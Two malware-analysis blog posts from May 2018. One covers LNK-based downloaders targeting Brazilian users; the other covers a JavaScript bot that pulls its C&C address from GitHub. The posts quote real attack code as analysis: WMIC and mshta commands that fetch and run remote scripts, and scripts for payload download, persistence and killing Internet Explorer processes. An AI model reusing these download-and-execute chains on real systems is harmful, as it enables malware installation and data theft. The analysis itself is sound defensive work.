Monday, 28 May 2018

LNK files targeting Brazilian Users

Recently, I observed a lot of LNK files crafted to target users located in Brazil. The details of this campaign are not documented anywhere and the final stage payloads (binary files) are not even present on public sources such as VirusTotal.

Interestingly, there are numerous references in the source code to characters from World of Warcraft in the form of variable names. The most important reference being: SABNOCK.

This campaign has been active for the past few months however they frequently keep updating.

The original attack vector is an LNK based Downloader sent inside a ZIP archive.

On 25th of May 2018, I observed an LNK file which leveraged WMIC to download the malicious MSI file.

Name of the LNK file: v114googlexx4.lnk
MD5 hash of the LNK file: ac212f8d998343e77edfab76cbf3656e
MD5 hash of the ZIP file: dadc0ec5a5460e8c30859cc6fc3d9d7a

Target of the LNK file: C:\WINDOWS\system32\wbem\WMIC.exe process call create "msiexec.exe /i hxxp:// /q"

And on 27th of May 2018, I already observed a new variant which updated the way the next stage payloads are downloaded.

Name of the LNK file:
MD5 hash of the LNK file: e288ebcfcf2b5b10f774618de059d66b
MD5 hash of the ZIP file: 65f127944263a99c2834d8abf6d408ec

Target of the LNK file: C:\WINDOWS\system32\Wbem\WMIC.exe  os get /format:"hxxp://"

This LNK file uses the technique of leveraging WMIC to download an XSL file which contains a script. This is possible by passing the command line parameter: "/format".

Geo IP check

It is important to note that the C&C Servers in this case use a Geo IP mechanism to ensure that the correct response is given only if the request is coming from the intended targeted region. In this case, the Geo IP check ensures that the request is coming from Brazil.

As an example, if I try to connect to the above URL using a non Brazil IP address, we can see that the Server returns a 404 Not Found Response as shown below:

Figure 1

I configured my TOR exit node to connect through Brazil. Now, when I attempt to connect to the above URL, it returns me the correct response as shown below:

Figure 2

XSL File Analysis

The main purpose of the XSL file in this case is to leverage mshta to download the malicious JavaScript file from the URL:

    var r = new ActiveXObject("WScript.Shell").Run('mshta.exe javascript:try{try{javascript:GetObject("script:ht"+"tp://");self.close();}catch(e){}}catch(e){};self.close();');

SCT File Analysis

This is the main Scriptlet file which performs the following main actions:

1. Downloads the next stage payloads from randomly chosen domains.
2. Configures the system for persistence.
3. Executes the next stage payloads.

Random Domain Selection

radador() is a function in this SCT file which is used to generate a random number between the min and max range supplied to it as arguments.

pingadori is a random number generated in the range, 1 to 52.

Corresponding to each number, there is a domain name which will be used to fetch the next stage payloads.

The complete list of domains is mentioned in the Appendix.

Downloading the Modules

The function, Bxaki() will take two parameters.

URL -> The URL from which it needs to fetch the file.
File -> The path where the file needs to be downloaded

All the files will be downloaded to the directory: %userprofile%\tempwd

The downloaded URLs are constructed as shown below:

xVRXastaroth2 = "ht"+"tp://vrx"+radador(1111111,9999999)+"."+xVRXastaroth+":"+radador(25010,25099)+"/"+ smaeVar;

1. It generates a random number in the range, 1111111 to 9999999 and appends it to the string: "http://vrx".
2. It generates another random number in the range, 25010 to 25099. This is the port number.

So, the download URLs have both static and dynamic parts. The reason for generating these random numbers is to prevent detection of the network traffic. Although, since there are still some static parts in the URL, so it is possible detect on that basis.

Below is a summary of the different files downloaded and the corresponding URLs:

sysvw.lnk - Downloaded from the URL: xVRXastaroth2 +""+radador(0000001,999999999)
SABNOCKXa.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXb.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXe.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXf.jpg - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXg.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
SABNOCKXdwwn.gif - Downloaded from the URL: xVRXastaroth2 + ""+radador(0000001,999999999)
system64.exe - Downloaded from the URL: xVRXastaroth2 + "gerarhv121.php?"+radador(0000001,999999999)

system64.exe is the next stage payload which will be dropped and executed as shown below:

var xxWshShell = new ActiveXObject("WScript.Shell");"\\system64.exe  /xy /"+radador(0000001,999999999),0,true);

This binary will be executed with the command line arguments: "/xy /<random_number>"


The LNK file, sysvw.lnk is downloaded to the path: %userprofile%\tempwd\sysvw.lnk

This LNK file will be copied to the path: %appdata%\\microsoft\\windows\\start menu\\programs\\startup\\ for persistence.

The target of the LNK file is: C:\WINDOWS\explorer.exe /e,/start,system64.exe

It ensures that everytime the system is started, it will execute the system64.exe binary.

In the follow up blog post, I will share the details of the payload.



List of Domains used to fetch the next stage Payload  

Thursday, 24 May 2018

JavaScript based Bot using Github C&C

An LNK file was discovered in the wild recently on 22nd May 2018 which used an interesting mechanism for C&C communication leveraging github and used a new JavaScript based Bot for performing malicious activities on the system.

MD5 hash of the ZIP file:  f444bfe1e65b5e2bef8984c740bd0a49
MD5 hash of the LNK file: 219dedb53da6b1dce0d6c071af59b45c
Filename: 200_Germany.lnk

Config File details are mentioned at the end of the article.

The Target of the LNK file is as shown below:

%comspec% /c copy 2*.lnk %tmp%&%systemdrive%&cd %tmp%&attrib +r *.lnk&for /f "delims=" %a in ('dir /s /b *.LnK') do type "%~fa" | find "p0b2x6">.js &CsCRipt .js  "%~fa"

This LNK file contains a malicious JavaScript inside it which will be dropped and executed using cscript.

The JavaScript is as shown below:

 Figure 1
It also contains a decoy CSV file which will be displayed to the end user after execution.

The LNK file first searches for all the lines containing the marker "p0b2x6" inside it. Each of these lines correspond to the  JavaScript which will be used to perform further malicious activities.

Analysis of the JavaScript file

Below are the main functions performed by the JavaScript file:

1. Collects information about the AV software running on the machine using the following WMI query:
SELECT displayName FROM AntiVirusProduct

2. Collects information about the version of the OS by running the WMI query:
SELECT * FROM Win32_OperatingSystem

3. The decoy contents will be extracted from the LNK file and dropped on the file system with the filename: 200_Germany.csv. This is the decoy file which will be displayed to the user as shown below:

Figure 2
4. It creates the storage directory in the path: %localappdata%\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

It is important to note that the environment variable, %localappdata% is present only on Windows 7 and above.

5. It creates a kill.js file in the Storage directory with the following contents:

var oWMISrvc = GetObject("winmgmts:\\\\.\\root\\cimv2");while(1){WScript.Sleep(180000); cProcNIE();}function cProcNIE() {try {var colProcLst = oWMISrvc.ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE '%-Embedding%' AND Name = 'iexplore.exe'");var objItem = new Enumerator(colProcLst);for(;!objItem.atEnd();objItem.moveNext()) {var p = objItem.item();p.Terminate();}} catch  (e) {}}

The purpose of this JS file is to kill any running instances of Internet Explorer which have the command line parameter matching: "-Embedding". The reason to do this is because InternetExplorer.Application ActiveX Object is used by the JavaScript to perform the C&C communication.

6. Creates a startup.js file in the storage directory with the following contents:

var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("C:\\Windows\\System32\\cscript.exe %localappdata%\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\\file.js", 0, 0);

The purpose of this file is to execute the main malicious JavaScript file.

7. Copies the main JavaScript file to the storage directory with the filename: file.js

8. Executes the main JavaScript, file.js

9. Deletes the original instance of the JavaScript.

The following actions are performed when the main JavaScript is executed from the storage directory.

10. Creates an lck file, h.lck in the storage directory.

11. Kills any running instance of iexplore.exe as described in the step 5 above.

12. Creates a Windows Registry file, g3r.reg in the storage directory with the following information:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Control Panel\Cursors]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]


This registry file is executed using: reg import command and it results in the creation of the Persistence Registry key which points to service.lnk file dropped in the Storage Directory.

13. Creates a Shortcut, LNK file with the name, service.lnk in the Storage Directory whose target points to startup.js in the storage directory.

C&C Communication

The most interesting part in this sample was the C&C Communication. The C&C Server address is retrieved from github as shown below:

JavaScript calls the extract_srvaddr() function which performs the following main actions:

1. Connects to the following github URLs:

Looks for the pattern: "our news start at (.*) thank you"

Please refer the screenshot below:

Figure 3
2. Once it finds the above pattern, it extracts the number. In our case, the number is: 2077937692956. This number is the decimal representation of the C&C IP Address:

3. It calls the function, num2dot() to convert the above number to an IP address.

4. Validation of the C&C Server: It uses an interesting method to verify whether the C&C Server is indeed the actual intended server and not an analysis server. To do this, it constructs the following URL:


It connects to the above URL and looks for the string: youwillnotfindthisanywhare.

Please refer the screenshot below.

Figure 4
If this string is found in the HTML response, then it continues with the execution.

Data Exfiltration and C&C Commands

The communication between the JavaScript based bot and the C&C Server takes place using an instance of InternetExplorer.Application ActiveXObject.

The function, get_page_content_with_ie() is used to send GET and POST requests to the C&C Server.

The main requests sent are as shown below:

getid: Sends an HTTP POST request to the URL: hxxp:// with the following data:


In response, the C&C Server will return the ID as shown below:


getcommand: It retrieves the commands from the C&C Server by sending an HTTP POST request to the URL: hxxp:// and sending the following data:


The Server responds with the following data:


At the time of verification, the C&C Server was not responding with a command.

However, based on the static analysis of the JavaScript, it will perform the following actions on the command:

1. Parses the command searching for the keyword: "download"
2. If it finds the keyword, "download", then it splits the value using the delimiter, "|"
3. Sends an HTTP GET request to the URL: hxxp://<value> to fetch the response
4. If the response is a binary, then the file will be dropped and executed.
5. Otherwise the command will be executed directly using cmd.exe

Config File

URLs: ['',''];
version = "1.3"
ref = "bd"
StorageDir = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}";
startup_shortcut = services.lnk
agent_location = file.js
agent_hidden_executer = startup.js
g3r = g3r.reg
agent_id_location = id
lckFile = h.lck
ieFile = kill.js
sctFile = SC7.P7D
pyFile =